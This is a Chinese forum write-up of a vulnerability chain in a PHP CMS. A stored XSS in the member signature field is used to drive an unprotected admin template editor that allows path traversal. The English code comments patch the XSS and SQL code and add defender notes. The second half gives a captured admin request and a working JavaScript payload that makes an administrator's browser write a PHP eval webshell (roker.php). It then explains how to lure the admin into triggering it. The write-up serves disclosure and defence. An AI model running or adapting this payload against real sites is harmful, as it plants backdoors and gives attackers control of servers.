|
这个 CMS 以前 90 有人发过一个 getshell，当时是后台验证文件的问题，
官网已经修补了，所以重新下了源码。
因为后台登录还需要认证码，所以注入就没看了。（补充：下面 user/do.php 里的 UPDATE 语句仍然是字符串拼接，这些字段在更早的地方是否已经做过转义本帖看不到，值得另行核实。）
存在 XSS。
漏洞文件 user/member/skin_edit.php（签名字段 CS_Qianm 被直接 echo 到 textarea 里，没有做 HTML 编码）：
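<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php
// The signature is user-controlled (saved by user/do.php, op=zl) and was
// previously echoed into the textarea verbatim, which is the stored XSS this
// post describes: a "</textarea><script>" in the value breaks out of the field.
// Encode it before output. ENT_QUOTES also makes the value safe in attributes.
// NOTE(review): the site's charset is not visible here; if pages are served
// as GBK, pass that charset instead of 'UTF-8' — on PHP 5.4+ htmlspecialchars()
// returns an empty string for byte sequences invalid in the given charset.
echo htmlspecialchars($cscms_qianm, ENT_QUOTES, 'UTF-8');
?></textarea></td></tr>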
user/do.php（保存资料的处理代码）：
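if($op=='zl'){ // profile ("资料"): save the member's profile fields
    // The CS_* fields come from the profile form and $cscms_name from the
    // member's login state; the original code interpolated all of them into the
    // UPDATE verbatim. Escape the quoted string fields and cast the one numeric
    // field (CS_Sex is interpolated without quotes, so quoting/escaping cannot
    // protect it) before the SQL is assembled.
    // NOTE(review): addslashes() is used only because $db's API is not visible
    // here. A prepared statement through the project's DB layer is the proper
    // fix, and if the framework already escapes request fields upstream
    // (magic_quotes or a global filter) this would double-escape — confirm.
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
    $nichen = addslashes($CS_Nichen);
    $email  = addslashes($CS_Email);
    $sex    = intval($CS_Sex);     // unquoted in the SQL: an integer cast is the only safe form
    $city   = addslashes($CS_City);
    $qq     = addslashes($CS_QQ);
    $qianm  = addslashes($CS_Qianm); // stored raw on purpose; it must be HTML-encoded wherever it is rendered
    $name   = addslashes($cscms_name);
    $sql="update ".Getdbname('user')." set CS_Nichen='".$nichen."',CS_Email='".$email."',
        CS_Sex=".$sex.",CS_City='".$city."',CS_QQ='".$qq."',CS_Qianm='".$qianm."'
        where CS_Name='".$name."'";
    if($db->query($sql)){
        // The success path also goes through Msg_Error(); kept as in the original.
        exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
    }
}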
没有过滤，导致 XSS 产生（签名原样入库，输出时也没有编码）。
后台看了下，很奇葩的是模板编辑处可以写任意格式的文件：从抓包看，name=aaa.php 直接被接受，path 参数还带着 ../../ 的目录穿越。
抓包如下：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E

（请求体里只有 name 和 content 两个字段，没有任何防 CSRF 的 token；写入目录由 path 参数决定，文件名由 name 决定。）
于是构造 JS 如下（放进签名里，在管理员浏览器中以其后台登录态执行）：
<script>
// PoC payload from the post. When it runs in a logged-in administrator's
// browser (delivered through the stored XSS in the signature field) it POSTs a
// "template" to the admin template editor, which writes the body to disk under
// the attacker-chosen path and file name — here a PHP one-liner.
// Defender notes: look for POST /admin/skins/skins.php?ac=xgmb&op=go with a
// "../" in `path` or a `name` ending in .php, and for new files under skins/.
thisTHost = top.location.hostname;   // implicit global; target host is taken from the victim's own page
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
// Builds a hidden form with two fields, `name` (file name) and `content`
// (file body), and submits it as a POST to `url`. The parameter names are
// misleading: `data` becomes the `name` field and `msg` becomes `content`.
function PostSubmit(url, data, msg) {
  var postUrl = url;
  var postData = data;
  var msgData = msg;
  var ExportForm = document.createElement("FORM");
  document.body.appendChild(ExportForm);
  ExportForm.method = "POST";
  var newElement = document.createElement("input");
  newElement.setAttribute("name", "name");
  newElement.setAttribute("type", "hidden");
  var newElement2 = document.createElement("input");
  newElement2.setAttribute("name", "content");
  newElement2.setAttribute("type", "hidden");
  ExportForm.appendChild(newElement);
  ExportForm.appendChild(newElement2);
  newElement.value = postData;
  newElement2.value = msgData;
  ExportForm.action = postUrl;
  // Submitting navigates the admin's window to the response. The captured
  // request above carries no anti-CSRF token, and because this runs
  // same-origin via the XSS a token alone would not have stopped it either.
  ExportForm.submit();
};
// Writes roker.php containing a PHP eval backdoor into skins/index/html/.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上面的 JS。
然后用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）；
管理员带着后台登录态打开页面时，就会在 skins\index\html\ 目录下生成 roker.php 一句话。
|
|